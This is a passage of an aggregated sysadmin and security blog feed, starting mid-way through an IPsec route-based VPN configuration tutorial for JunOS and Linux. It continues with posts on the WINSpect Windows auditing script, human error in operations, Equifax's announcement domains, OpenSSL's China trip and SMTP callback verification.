Let’s assume we want to configure the IPsec VPN from V3-2 to V1-1. First, we need to configure the tunnel interface and bind it to the “private” routing instance containing only internal routes (with IPv4, they would have been RFC 1918 routes):

interfaces {
    st0 {
        unit 1 {
            family inet6 {
                address 2001:db8:ff::7/127;
            }
        }
    }
}
routing-instances {
    private {
        instance-type virtual-router;
        interface st0.1;
    }
}

The second step is to configure the VPN:

security {
    /* Phase 1 configuration */
    ike {
        proposal IKE-P1 {
            authentication-method pre-shared-keys;
            dh-group group20;
            encryption-algorithm aes-256-gcm;
        }
        policy IKE-V1-1 {
            mode main;
            proposals IKE-P1;
            pre-shared-key ascii-text "d8bdRxaY22oH1j89Z2nATeYyrXfP9ga6xC5mi0RG1uc";
        }
        gateway GW-V1-1 {
            ike-policy IKE-V1-1;
            address 2001:db8:1::1;
            external-interface lo0.1;
            general-ikeid;
            version v2-only;
        }
    }
    /* Phase 2 configuration */
    ipsec {
        proposal ESP-P2 {
            protocol esp;
            encryption-algorithm aes-256-gcm;
        }
        policy IPSEC-V1-1 {
            perfect-forward-secrecy keys group20;
            proposals ESP-P2;
        }
        vpn VPN-V1-1 {
            bind-interface st0.1;
            df-bit copy;
            ike {
                gateway GW-V1-1;
                ipsec-policy IPSEC-V1-1;
            }
            establish-tunnels on-traffic;
        }
    }
}

We get a route-based VPN because we bind the st0.1 interface to the VPN-V1-1 VPN. Once the VPN is up, any packet entering st0.1 will be encapsulated and sent to the 2001:db8:­1::1 endpoint.

The last step is to configure BGP in the “private” routing instance to exchange routes with the remote site:

routing-instances {
    private {
        routing-options {
            router-id 1.0.3.2;
            maximum-paths 16;
        }
        protocols {
            bgp {
                preference 140;
                log-updown;
                group v4-VPN {
                    type external;
                    local-as 65003;
                    hold-time 6;
                    neighbor 2001:db8:ff::6 peer-as 65001;
                    multipath;
                    export [ NEXT-HOP-SELF OUR-ROUTES NOTHING ];
                }
            }
        }
    }
}

The export filter OUR-ROUTES needs to select the routes to be advertised to the other peers. For example:

policy-options {
    policy-statement OUR-ROUTES {
        term 10 {
            from {
                protocol ospf3;
                route-type internal;
            }
            then {
                metric 0;
                accept;
            }
        }
    }
}

The configuration needs to be repeated for the other peers. The complete version is available on GitHub. Once the BGP sessions are up, we start learning routes from the other sites. For example, here is the route for 2001:db8:­a1::/64:

> show route 2001:db8:a1::/64 protocol bgp table private.inet6.0 best-path

private.inet6.0: 15 destinations, 19 routes (15 active, 0 holddown, 0 hidden)
+ = Active Route, - = Last Active, * = Both

2001:db8:a1::/64   *[BGP/140] 01:12:32, localpref 100, from 2001:db8:ff::6
                      AS path: 65001 I, validation-state: unverified
                      to 2001:db8:ff::6 via st0.1
                    > to 2001:db8:ff::14 via st0.2

It was learnt both from V1-1 (through st0.1) and V1-2 (through st0.2). The route is part of the private routing instance but encapsulated packets are sent/received in the public routing instance. No route-leaking is needed for this configuration. The VPN cannot be used as a gateway from internal hosts to external hosts (or vice-versa). This could also have been done with JunOS’ security policies (stateful firewall rules) but doing the separation with routing instances also ensure routes from different domains are not mixed and a simple policy misconfiguration won’t lead to a disaster.

Route-based VPN on Linux

Starting from Linux 3.15, a similar configuration is possible with the help of a virtual tunnel interface3. First, we create the “private” namespace:

# ip netns add private
# ip netns exec private sysctl -qw net.ipv6.conf.all.forwarding=1

Any “private” interface needs to be moved to this namespace (no IP is configured as we can use IPv6 link-local addresses):

# ip link set netns private dev eth1
# ip link set netns private dev eth2
# ip netns exec private ip link set up dev eth1
# ip netns exec private ip link set up dev eth2

Then, we create vti6, a tunnel interface (similar to st0.1 in the JunOS example):

# ip tunnel add vti6 \
   mode vti6 \
   local 2001:db8:1::1 \
   remote 2001:db8:3::2 \
   key 6
# ip link set netns private dev vti6
# ip netns exec private ip addr add 2001:db8:ff::6/127 dev vti6
# ip netns exec private sysctl -qw net.ipv4.conf.vti6.disable_policy=1
# ip netns exec private sysctl -qw net.ipv4.conf.vti6.disable_xfrm=1
# ip netns exec private ip link set vti6 mtu 1500
# ip netns exec private ip link set vti6 up

The tunnel interface is created in the initial namespace and moved to the “private” one. It will remember its original namespace where it will process encapsulated packets. Any packet entering the interface will temporarily get a firewall mark of 6 that will be used only to match the appropriate IPsec policy4 below. The kernel sets a low MTU on the interface to handle any possible combination of ciphers and protocols. We set it to 1500 and let PMTUD do its work.

We can then configure strongSwan5:

conn V3-2
  left        = 2001:db8:1::1
  leftsubnet  = ::/0
  right       = 2001:db8:3::2
  rightsubnet = ::/0
  authby      = psk
  mark        = 6
  auto        = route
  keyexchange = ikev2
  keyingtries = %forever
  ike         = aes256gcm16-prfsha384-ecp384!
  esp         = aes256gcm16-prfsha384-ecp384!
  mobike      = no

The IKE daemon configures the following policies in the kernel:

$ ip xfrm policy
src ::/0 dst ::/0
        dir out priority 399999 ptype main
        mark 0x6/0xffffffff
        tmpl src 2001:db8:1::1 dst 2001:db8:3::2
                proto esp reqid 1 mode tunnel
src ::/0 dst ::/0
        dir fwd priority 399999 ptype main
        mark 0x6/0xffffffff
        tmpl src 2001:db8:3::2 dst 2001:db8:1::1
                proto esp reqid 1 mode tunnel
src ::/0 dst ::/0
        dir in priority 399999 ptype main
        mark 0x6/0xffffffff
        tmpl src 2001:db8:3::2 dst 2001:db8:1::1
                proto esp reqid 1 mode tunnel
[…]

Those policies are used for any source or destination as long as the firewall mark is equal to 6, which matches the mark configured for the tunnel interface.

The last step is to configure BGP to exchange routes. We can use BIRD for this:

router id 1.0.1.1;
protocol device {
   scan time 10;
}
protocol kernel {
   persist;
   learn;
   import all;
   export all;
   merge paths yes;
}
protocol bgp IBGP_V3_2 {
   local 2001:db8:ff::6 as 65001;
   neighbor 2001:db8:ff::7 as 65003;
   import all;
   export where ifname ~ "eth*";
   preference 160;
   hold time 6;
}

Once BIRD is started in the “private” namespace, we can check routes are learned correctly:

$ ip netns exec private ip -6 route show 2001:db8:a3::/64
2001:db8:a3::/64 proto bird metric 1024
        nexthop via 2001:db8:ff::5  dev vti5 weight 1
        nexthop via 2001:db8:ff::7  dev vti6 weight 1

The above route was learnt from both V3-1 (through vti5) and V3-2 (through vti6). Like for the JunOS version, there is no route-leaking between the “private” namespace and the initial one. The VPN cannot be used as a gateway between the two namespaces, only for encapsulation. This also prevent a misconfiguration (for example, IKE daemon not running) from allowing packets to leave the private network.

As a bonus, unencrypted traffic can be observed with tcpdump on the tunnel interface:

$ ip netns exec private tcpdump -pni vti6 icmp6
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on vti6, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes
20:51:15.258708 IP6 2001:db8:a1::1 > 2001:db8:a3::1: ICMP6, echo request, seq 69
20:51:15.260874 IP6 2001:db8:a3::1 > 2001:db8:a1::1: ICMP6, echo reply, seq 69

You can find all the configuration files for this example on GitHub. The documentation of strongSwan also features a page about route-based VPNs.


  1. Everything in this post should work with Libreswan

  2. fwd is for incoming packets on non-local addresses. It only makes sense in transport mode and is a Linux-only particularity. 

  3. Virtual tunnel interfaces (VTI) were introduced in Linux 3.6 (for IPv4) and Linux 3.12 (for IPv6). Appropriate namespace support was added in 3.15. KLIPS, an alternative out-of-tree stack available since Linux 2.2, also features tunnel interfaces. 

  4. The mark is set right before doing a policy lookup and restored after that. Consequently, it doesn’t affect other possible uses (filtering, routing). However, as Netfilter can also set a mark, one should be careful for conflicts. 

  5. The ciphers used here are the strongest ones currently possible while keeping compatibility with JunOS. The documentation for strongSwan contains a complete list of supported algorithms as well as security recommendations to choose them. 

by Vincent Bernat at September 13, 2017 08:20 AM

September 11, 2017

HolisticInfoSec.org

Toolsmith Tidbit: Windows Auditing with WINspect

WINSpect recently hit the toolsmith radar screen via Twitter, and the author, Amine Mehdaoui, just posted an update a couple of days ago, so no time like the present to give you a walk-through. WINSpect is a Powershell-based Windows Security Auditing Toolbox. According to Amine's GitHub README, WINSpect "is part of a larger project for auditing different areas of Windows environments. It focuses on enumerating different parts of a Windows machine aiming to identify security weaknesses and point to components that need further hardening. The main targets for the current version are domain-joined windows machines. However, some of the functions still apply for standalone workstations."
The current script feature set includes audit checks and enumeration for:

  • Installed security products
  • World-exposed local filesystem shares
  • Domain users and groups with local group membership
  • Registry autoruns
  • Local services that are configurable by Authenticated Users group members
  • Local services for which corresponding binary is writable by Authenticated Users group members
  • Non-system32 Windows Hosted Services and their associated DLLs
  • Local services with unquoted path vulnerability
  • Non-system scheduled tasks
  • DLL hijackability
  • User Account Control settings
  • Unattended installs leftovers
I can see this useful PowerShell script coming in quite handy for assessment using the CIS Top 20 Security Controls. I ran it on my domain-joined Windows 10 Surface Book via a privileged PowerShell and liked the results.


The script confirms that it's running with admin rights, checks PowerShell version, then inspects Windows Firewall settings. Looking good on the firewall, and WINSpect tees right off on my Window Defender instance and its configuration as well.
Not sharing a screenshot of my shares or admin users, sorry, but you'll find them enumerated when you run WINSpect.


 WINSpect then confirmed that UAC was enabled, and that it should notify me only apps try to make changes, then checked my registry for autoruns; no worries on either front, all confirmed as expected.


WINSpect wrapped up with a quick check of configurable services, SMSvcHost is normal as part of .NET, even if I don't like it, but the flowExportService doesn't need to be there at all, I removed that a while ago after being really annoyed with it during testing. No user hosted services, and DLL Safe Search is enable...bonus. Finally, no unattended install leftovers, and all the scheduled tasks are normal for my system. Sweet, pretty good overall, thanks WINSpect. :-)

Give it a try for yourself, and keep an eye out for updates. Amine indicates that Local Security Policy controls, administrative shares configs, loaded DLLs, established/listening connections, and exposed GPO scripts on the to-do list. 
Cheers...until next time.

by Russ McRee (noreply@blogger.com) at September 11, 2017 12:29 AM

September 10, 2017

Debian Administration

This site is going to go read-only

This site was born in late September 2004, and has now reached 13 years of age and that seems to be a fitting time to stop.

by Steve at September 10, 2017 07:02 AM

September 08, 2017

Michael Biven

Reducing Human Error in Software Based Services

As I’m writing this Texas and Louisiana continue to deal with the impact of Hurricane Harvey. Hurricane Irma is heading towards Florida. Los Angeles just experienced the biggest fire to burn in its history (La Tuna Fire). And in the last three months there have been two different collisions between US Navy vessels and civilian ships that resulted in 17 fatalities and multiple injuries.

The interaction and relationships between people, actions, and events in high risk endeavors is awe inspiring. Put aside the horrific loss of life and think of the amount of stress and chaos involved. Imagine knowing that your actions can have irreversible consequences. Though they can’t be changed I’m fascinated with efforts to prevent them from repeating.

Think of those interactions between people, actions and events as change. There are examples of software systems having critical or fatal consequences when failing to handle them. For most of us the impact might be setbacks delaying work or at most a financial consequence to our employer or ourselves. While the impact may differ there are benefits from learning from professions other than our own that deal with change on a daily basis.

Our job as systems or ops engineers should be on how to build, maintain, troubleshoot, and retire the systems we’re responsible for. But there’s been a shift building that has us focusing more on becoming experts at evaluating new technology.

Advances in our tooling has allowed us to rebuild, replace, or re-provision from failures. This starts introducing complacency, because the tools start to have more context of the issues than us. It shifts our focus away from reaching a better idea of what’s happening.

As the complexity and the number of systems involved increases our ability to understand what is happening and how they interact hasn’t kept up. If you have any third-party dependencies, what are the chances they’re going through a similar experience? How much of an impact does this have on your understanding of what’s happening in your own systems?

Atrophy of Basics Skills

The increased efficiency of our tooling creates a Jevons paradox. This is an economic idea that as the efficiency of something increases it will lead to more consumption instead of reducing it. Named after William Jevons who in the 19th century noticed that the consumption of coal increased after the release of a new steam engine design. The improvements with this new design increased the efficiency of the coal-fired steam engine over it’s predecessors. This fueled a wider adoption of the steam engine. It became cheaper for more people to use a new technology and this led to the increased consumption of coal.

For us the engineer’s time is the coal and the tools are the new coal-fired engine. As the efficiency of the tooling increases we tend to use more of the engineer’s time. The adoption of the tooling increases while the number of engineers tends to remain flat. Instead of bringing in more people we tend to try to do more with the people we have.

This contributes to an atrophying of the basic skills needed to do the job. Things like troubleshooting, situational awareness, and being able to hold a mental model of what’s happening. It’s a journeyman’s process to build them. Actual production experience is the best teacher and the best feedback is from your peers. Tools are starting to replace the opportunities for people to have those experiences to learn from.

Children of the Magenta and the Dangers of Automation

For most of us improving the efficiency of an engineer’s time will look like some sort of automation. And while there are obvious benefits there are some not so obvious negatives. First, automation can hide the context of what is, has, and will happen from us. How many times have you heard or asked yourself “What’s it doing now?”

“A lot of what’s happening is hidden from view from the pilots. It’s buried. When the airplane starts doing something that is unexpected and the pilot says ‘hey, what’s it doing now?’ — that’s a very very standard comment in cockpits today.’”
– William Langewiesche, journalist and former American Airlines captain.

In May 31, 2009 228 people died when Air France 447 lost altitude from 35,000 feet and pancaked into the Atlantic Ocean. A pressure probe had iced over preventing the aircraft from determining its speed. This caused the autopilot to disengage and the “fly-by-wire” system switched into a different mode.

“We appear to be locked into a cycle in which automation begets the erosion of skills or the lack of skills in the first place and this then begets more automation.” – William Langewiesche

Four years later Asiana Airlines flight 214 crashed on their final approach into SFO. It came in short of the runway striking the seawall. The NTSB report shows the flight crew mismanaged the initial approach and the aircraft was above the desired glide path. The captain responded by selecting the wrong autopilot mode, which caused the auto throttle to disengage. He had a faulty mental model of the aircraft’s automation logic. This over-reliance on automation and lack of understanding the systems was cited as major factors leading to the accident.

This has been described as “Children of the Magenta” due to the information presented in the cockpit from the autopilot being magenta in color. It was coined by Capt. Warren “Van” Vanderburgh at American Airlines Flight Academy. There are different levels of automation in an aircraft and he argues that by reducing the level of automation you can reduce the workload in some situations. The amount of automation should match the current conditions of the environment. It’s a 25 minute video that’s worth watching, but it boils down to this. Pilots have become too dependent on automation in general and are losing the skills needed to safely control their aircraft.

This led a Federal Aviation Administration task force on cockpit technology to urge airlines to have their pilots spend more time flying by hand. This focus of returning to the basic skills needed is similar to the report released from the Government Accountability Office (GAO) regarding the impact of maintenance and training on the readiness of the US Navy.

Based on updated data, GAO found that, as of June 2017, 37 percent of the warfare certifications for cruiser and destroyer crews based in Japan—including certifications for seamanship—had expired. This represents more than a fivefold increase in the percentage of expired warfare certifications for these ships since GAO’s May 2015 report.

What if Automation is part of the Product?

Knight Capital was a global financial services firm engaging in market making. They used high-frequency trading algorithms to manage a little over a 17% market share on NYSE and almost 17% on NASDAQ. In 2012 a new program was about to be released at the NYSE called Retail Liquidity Program (RLP). Knight Capital made a number of changes to it’s systems and software to handle the change. This included adding new code to an automated, high speed, algorithmic router called SMARS that would send orders into the market.

This was intended to replace some deprecated code in SMARS called Power Peg. Except it wasn’t deprecated and it was still being used. The new code for RLP even used the same feature flag as Power Peg. During the deploy one server was skipped and no one noticed the deployment was incomplete. When the feature flag for SMARS was activated it triggered the Power Peg code on that one server that was missing the update. After 45 minutes of routing millions of order into the market (4 million executions on 154 stocks) Knight Capital lost around $460 million dollars. In this case automation could have helped.

Automation is not a bad thing. You need to be thoughtful and clear on how it’s being used and how it functions. In Ten Challenges for Making Automation a “Team Player” in Joint Human-Agent Activity the authors provide a guideline for this. They show the interaction between people and automation can be improved by meeting four basic requirements (here I’m thinking that robots only had three laws). They then go on to describe the ten biggest challenges to satisfy them.

Four Basic Requirements

  1. Enter into an agreement, which we’ll call a Basic Compact, that the participants intend to work together
  2. Be mutually predictable in their actions
  3. Be mutually directable
  4. Maintain common ground

Complexity and Chaos

Complexity has a tendency to bring about chaos. Due to the difficulty of people to understand the system(s). Incomplete visibility into what is happening. The number of possibilities within them, including both the normal events, mutability of the data, and the out of ordinary. That encompasses failures, people using the system(s) in unexpected ways, large spikes in requests, and bad actors.

If this is the environment that we find ourselves working in we can only control the things we bring into it. That includes making sure we have a grasp on the basics of our profession and maintain the best possible understanding of what’s happening with our systems. This should allow us to work around issues as they happen and decrease our dependencies on our tools. There’s usually more than one way to get information or make a change. Knowing the basics and staying aware of what is happening can get us through the chaos.

There are three people whose works can help navigate these kind of conditions. John Boyd, Richard I. Cook, and Edward Tufte. Boyd gives us reference on how to work within chaos and how to use it to our own advantage. While Cook shows how complexity can fail and suggests ways to find the causes of those failures. And Tufte explains how we can reduce the complexity of the information we’re working with.

Team Resource Management

This leads us to a proven approach that has been used in aviation, fire fighting, and emergency medicine that we can adapt for our own use. In 1973 NASA started research into human factors in aviation safety. Several years later two Boeing 747s collided on the runway and killed 583 people. This prompted a workshop titled “Resource Management on the Flight Deck” that included the NASA researchers and the senior officers responsible for aircrew training from the major airlines. The result of this workshop was a focus on training to reduce the primary causes of aviation accidents called Crew Resource Management (CRM).

They saw the primary causes as human error and communication problems. The training would reinforce the importance of communication and orientating to what is actually happening. It changes the cultural muscle memory so when we start to see things go bad, we speak up and examine it. And it stresses a culture where authority may be questioned.

We’ve already adapted the Incident Command System for our own use… why not do the same with CRM?

What’s the Trend of Causes for Failures?

We don’t have a group like the NTSB or NASA focused on reducing failures in what we do. Yes, there are groups like USENIX, Apache Software Foundation, Linux Foundation, and the Cloud Native Computing Foundation. But I’m not aware of any of them tracking and researching the common causes of failures.

After a few searches for any reference to a postmortem, retro, or outages I came up with this list. These were pulled from searches on Lobsters, Hacker News, Slashdot, TechCrunch, Techmeme, High Scalability, and ArsTechnica. And in this very small nonscientific sample almost half are due to what I would call human error. There also the four power related causes. Don’t take anything out of this list other than the following. We would benefit from having more transparency of the failures in our industry and understanding their causes. 

Date Description and Link Cause
9/7/2017 Softlayer GLBS Outage Unclear
8/26/2017 BGP Leak caused internet outage in Japan Unknown
8/21/2017 Honeycomb outage In Progress
8/4/2017 Visual Studio Team Services outage Human Error
8/2/2017 Issues with Visual Studio Team Services Failed Dependency
5/18/2017 Let’s Encrypt OCSP outage Human Error
3/16/2017 Square Deploy Triggered Load
2/28/2017 AWS S3 Outage Human Error
2/9/2017 Instapaper Outage Cause & Recovery Human Error
1/31/2017 Gitlab Outage Human Error
1/22/2017 United Airlines grounded two hours, computer outage Unknown
10/21/2016 Dyn DNS DDoS DDoS
10/18/2016 Google Compute Engine Human Error
5/10/2016 SalesForce Failure after mitigating a power outage
1/28/2016 Github Service outage Cascading failure after power outage
1/19/2016 Twitter Human Error
7/27/2015 Joyent Manta Outage Locks Blocks The Data
1/10/2014 Dropbox Outage post-mortem Human Error
1/8/2014 GitHub Outage Human Error
3/3/2013 Cloudflare outage Unintended Consequences
8/1/2012 Knight Capital Human Error
6/30/2012 AWS power failure Double Failure of Generators during Power Outage
10/11/2011 Blackberry World Wide 3 Day Outage Hardware failure Hardware Failure and Failed Backup Process
11/15/2010 GitHub Outage Config Error Human Error

“For a successful technology, reality must take precedence over public relations, for nature cannot be fooled.” – R. P. Feynman Rogers Commission Report

September 08, 2017 05:10 PM

September 07, 2017

Michael Biven

Valid Security Announcements

A checklist item for the next time you need to create a landing page for a security announcement.

Make sure the certificate and the whois on the domain being used actually references the name of your company.

My wife sends me a link to this.

I then find the page for the actual announcement from Equifax.

Go to the dedicated website www.equifaxsecurity2017.com and find it’s using a Cloudflare SSL certificate.

The certificate chain doesn’t mention Equifax other than the DNS names used in the cert (*.equifaxsecurity2017.com and equifaxsecurity2017.com).

What happens if I do a whois?

$ whois equifaxsecurity2017.com
   Domain Name: EQUIFAXSECURITY2017.COM
   Registry Domain ID: 2156034374_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.markmonitor.com
   Registrar URL: http://www.markmonitor.com
   Updated Date: 2017-08-25T15:08:31Z
   Creation Date: 2017-08-22T22:07:28Z
   Registry Expiry Date: 2019-08-22T22:07:28Z
   Registrar: MarkMonitor Inc.
   Registrar IANA ID: 292
   Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
   Registrar Abuse Contact Phone: +1.2083895740
   Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
   Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
   Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
   Name Server: BART.NS.CLOUDFLARE.COM
   Name Server: ETTA.NS.CLOUDFLARE.COM
   DNSSEC: unsigned

Now I want to see if I’m impacted. Click on the “Check Potential Impact” and I’m taken to a new site (trustedidpremier.com/eligibility/eligibility.html).

And we get another certificate and a whois lacking any reference back to Equifax.

$ whois trustedidpremier.com
   Domain Name: TRUSTEDIDPREMIER.COM
   Registry Domain ID: 2157515886_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.registrar.amazon.com
   Registrar URL: http://registrar.amazon.com
   Updated Date: 2017-08-29T04:59:16Z
   Creation Date: 2017-08-28T17:25:35Z
   Registry Expiry Date: 2018-08-28T17:25:35Z
   Registrar: Amazon Registrar, Inc.
   Registrar IANA ID: 468
   Registrar Abuse Contact Email: registrar-abuse@amazon.com
   Registrar Abuse Contact Phone: +1.2062661000
   Domain Status: ok https://icann.org/epp#ok
   Name Server: NS-1426.AWSDNS-50.ORG
   Name Server: NS-1667.AWSDNS-16.CO.UK
   Name Server: NS-402.AWSDNS-50.COM
   Name Server: NS-934.AWSDNS-52.NET
   DNSSEC: unsigned

I’m not suggesting that the site equifaxsecurity2017 is malicious, but if you’re going to the trouble of setting up a page like this make sure your certificate and whois actually references back to the company making the announcement. If you look at the creation dates for the domain and the Not Valid Before dates on the certs they had plenty of time to get domains and certificates created that would reference themselves.

September 07, 2017 02:31 PM

September 01, 2017

Anton Chuvakin - Security Warrior

Monthly Blog Round-Up – August 2017

Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts/topics this
month:
  1. Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009. Is it relevant now? You be the judge.  Succeeding with SIEM requires a lot of work, whether you paid for the software, or not. BTW, this post has an amazing “staying power” that is hard to explain – I suspect it has to do with people wanting “free stuff” and googling for “open source SIEM” … 
  2. Simple Log Review Checklist Released!” is often at the top of this list – this aging checklist is still a very useful tool for many people. “On Free Log Management Tools” (also aged a bit by now) is a companion to the checklist (updated version)
    1. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our 2016 research on developing security monitoring use cases here!
    2. Again, my classic PCI DSS Log Review series is extra popular! The series of 18 posts cover a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book (now in its 4th edition!) – note that this series is mentioned in some PCI Council materials. 
    3. SIEM Resourcing or How Much the Friggin’ Thing Would REALLY Cost Me?” is a quick framework for assessing the SIEM project (well, a program, really) costs at an organization (a lot more details on this here in this paper).
    In addition, I’d like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 5X of the traffic of this blog]: 

    Current research on SIEM:
    Miscellaneous fun posts:

    (see all my published Gartner research here)
    Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016.

    Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here.

    Previous post in this endless series:

    by Anton Chuvakin (anton@chuvakin.org) at September 01, 2017 03:01 PM

    August 28, 2017

    OpenSSL

    OpenSSL Goes to China

    Over the past few years we’ve come to the realisation that there is a surprising (to us) amount of interest in OpenSSL in China. That shouldn’t have been a surprise as China is a huge technologically advanced country, but now we know better thanks to correspondence with many new Chinese contacts and the receipt of significant support from multiple Chinese donors (most notably from Smartisan.

    We have accepted an invitation from BaishanCloud to visit China in person and meet with interested OpenSSL users and stakeholders in September. We’d like to thank BaishanCloud for hosting us and Paul Yang and his colleagues there for the substantial amount of work that went into arranging this trip.

    Five of us (Matt Caswell, Tim Hudson, Richard Levitte, Steve Marquess and Rich Salz) will be in China from 18 September through 24 September, visiting Shanghai, Shenzhen, and Beijing. With this trip we hope to learn more about this significant portion of the open source and OpenSSL user communities, and hope to make OpenSSL more visible and accessible to that audience. Note that while not quite constituting a OpenSSL team meeting, this will be only the third time any significant number of the OpenSSL team have met in person.

    We will presenting on various aspects of OpenSSL on 23 September 2017 in Beijing. An introduction to the event and a registration link are available in Chinese.

    We will also be visiting Shanghai and Shenzhen earlier that week to meet with members of the open source community and OpenSSL users and stakeholders. If you can’t make it to the presentation above it may be possible to arrange to meet up with you in one of the above locations. Please drop us a line if you are interested in meeting with us.

    August 28, 2017 01:00 PM

    August 27, 2017

    That grumpy BSD guy

    Twenty-plus years on, SMTP callbacks are still pointless and need to die

    A rarely used legacy misfeature of the main Internet email protocol creeps back from irrelevance as a minor annoyance. You should ask your mail and antispam provider about their approach to 'SMTP callbacks'. Be wary of any assertion that is not backed by evidence.

    Even if you are an IT professional and run an email system, you could be forgiven for not being immediately aware that there is such a thing as SMTP callbacks, also referred to as callback verification. As you will see from the Wikipedia article, the feature was never widely adopted, and for all too understandable reasons.

    If you do run a mail system, you have probably heard about that feature's predecessor, the still-required but rarely used SMTP VRFY and EXPN commands. Those commands offer a way to verify whether an address is valid and to show the component addresses that a mailing list resolves to, respectively.

    Back when all things inter-networking were considered experimental and it was generally thought that information should flow freely in and between those experimental networks, it was quite common for mail servers to offer VRFY and EXPN service to all comers.

    I'm old enough to remember using VRFY by hand, telnet-ing to port 25 on a mail server and running VRFY $user@$domain.$tld commands to check whether an email address was indeed valid. I've forgotten which domains and persons were involved, but I imagine the reason why was that I wanted to contact somebody who had said something interesting in a post to a USENET news group.

    But networkers trying to make contact with each other were not the only ones who discovered the VRFY and EXPN commands.  Soon spammers were using those commands to actively harvest actually! valid! deliverable! addresses, and by 1999 the RFC2505 best practices document recommended disabling the features altogether. After all, there would usually be some other way available to find somebody's email address (there was even a FAQ, a longish Frequently Asked Questions document with apparent USENET origins written and maintained on the subject, a copy of which can be found here).

    In roughly the same time frame, somebody came up with the idea of SMTP callbacks. The idea was that all domains on the Internet need to publish the address of their mail exchangers via DNS MX (mail exchanger) records. The logical next step is then that when a piece of mail arrives over SMTP, the receiving end should be able to contact the sender domain's known mail exchanger to check that the sender address is indeed valid. If you by now hear the echoes of VRFY and EXPN, you're right. There are indications that some early implementations did in fact use VRFY for that purpose.

    But then the world changed, and you could not rely on VRFY being available in the post-RFC2505 world.

    In the post-RFC2505 world, the other side would most likely not offer up any useful information in response to VRFY commands, and you would most likely be limited to the short interchange that the Wikipedia entry quotes,
    HELO <verifier host name>
    MAIL FROM:<>
    RCPT TO:<the address to be tested>
    QUIT
    which a perceptive reader would identify as only verifying in a very limited sense that the domain's mail exchanger was indeed equipped with a functional SMTP service.

    It is worth noting, as many have over the years, that the MX records only specify where a domain expects to receive mail, not where valid mail from the domain is supposed to originate. Several mechanisms to help identify valid mail senders for a domain have been devised in the intervening years, but none existed at the time SMTP callbacks were considered even remotely useful. 

    For reasons that are not entirely clear, some developers kept working on SMTP callback code and several mail server implementations available today (2017) still contain code that looks like it was intended to support information-rich callbacks, if the system was configured to enable the feature at all. The default configurations in general do not enable the SMTP callback feature, and mail admins rarely bother to even learn much about the largely disused and (in my opinion at least) not too well thought out feature.

    This all happened back in the 1990s, but quite recently an incident occurred that indicates that in some pockets of the Internet, SMTP callbacks are still in use, and in at least some cases data from the callbacks are used for generating blacklists and block mail delivery. The last part should raise a few eyebrows at least.

    Jumping forward from the distant 1990s to the present day, regular readers of this column will be aware that bsdly.net and cooperating domains run SMTP service with OpenBSD spamd(8) doing greylisting service, and that the spamd(8) setup produces a greytrapping-based blacklist which is available for download, dumped to a file (available here and here) once per hour.

    Maintaining the mail system and the blacklist also involves keeping an eye on mail-related activities, and invalid addresses in our domains that turn up in the greylist are usually added to the list of spamtrap addresses within not too many hours after they first appear. The process of actually adding spamtrap addresses is a manual one, but based on the output of pathetically simple shell scripts that run as cron jobs.

    The list of spamtraps has grown over the years to more than 38 000 entries. Most of the entries have local parts that are pure generated gibberish, some entries are probably degraded versions of earlier spamtrap addresses and some again seem to conform with specific patterns, including but not limited to SMTP or NNTP message IDs.

    On August 19th and 20th 2017 I noticed a different, but yet familiar pattern in some of the new entries.

    The entry that caught my eye had the MAIL FROM: part as

    mx42.antispamcloud.com-1503146097-testing@bsdly.com

    The local part pattern was somewhat familiar, and breaks down to

        $localhostname-$epochtime-testing

    with @targetdomain.$tld (in our case, bsdly.com) appended. I had at this point totally forgotten about SMTP callbacks, but I decided to check the logs for any traces of activity involving that host. The only trace I could find in the logs was at the spamd-serving firewall in front of the bsdly.com domain's secondary mail exchanger:

    Aug 19 14:35:27 delilah spamd[26915]: 207.244.64.181: connected (25/24)
    Aug 19 14:35:38 delilah spamd[26915]: (GREY) 207.244.64.181: <> -> <mx42.antispamcloud.com-1503146097-testing@bsdly.com>
    Aug 19 14:35:38 delilah spamd[15291]: new entry 207.244.64.181 from <> to <mx42.antispamcloud.com-1503146097-testing@bsdly.com>, helo mx18-12.smtp.antispamcloud.com
    Aug 19 14:35:38 delilah spamd[26915]: 207.244.64.181: disconnected after 11 seconds.

    Essentially a normal first contact: spamd at our end answers slowly, one byte per second, but the greylist entry is created in the expectation that any caller with a valid message to deliver would try again within a reasonable time. The spamd synchronization between the hosts in our group of greylisting hosts would see to that an entry matching this sequence would appear in the greylist on all participating hosts.

    But the retry never happened, and even if it had, that particular local-part would anyway have produced an "Unknown user" bounce. But at that point I decided to do a bit of investigation and dug out what seemed to be a reasonable point of contact for the antispamcloud.com domain and sent an email with a question about the activity.

    That message bounced, with the following explanation in the bounce message body:

      DOMAINS@ANTISPAMCLOUD.COM
        host filter10.antispamcloud.com [31.204.155.103]
        SMTP error from remote mail server after end of data:
        550 The sending IP (213.187.179.198) is listed on https://spamrl.com as a source of dictionary attacks.

    As you have probably guessed, 213.187.179.198 is the IPv4 address of the primary mail exchanger for bsdly.net, bsdly.com and a few other domains under my care.

    If you go to the URL quoted in the bounce, you will notice that the only point of contact is via an email adress in an unrelated domain.

    I did fire off a message to that address from an alternate site, but before the answer to that one arrived, I had managed to contact another of their customers and got confirmation that they were indeed running with an exim setup that used SMTP callbacks.

    The spamrl.com web site states clearly that they will not supply any evidence in support of their decision to blacklist. Somebody claiming to represent spamrl.com did respond to my message, but as could be expected from their published policy was not willing to supply any evidence to support the claim stated in the bounce.

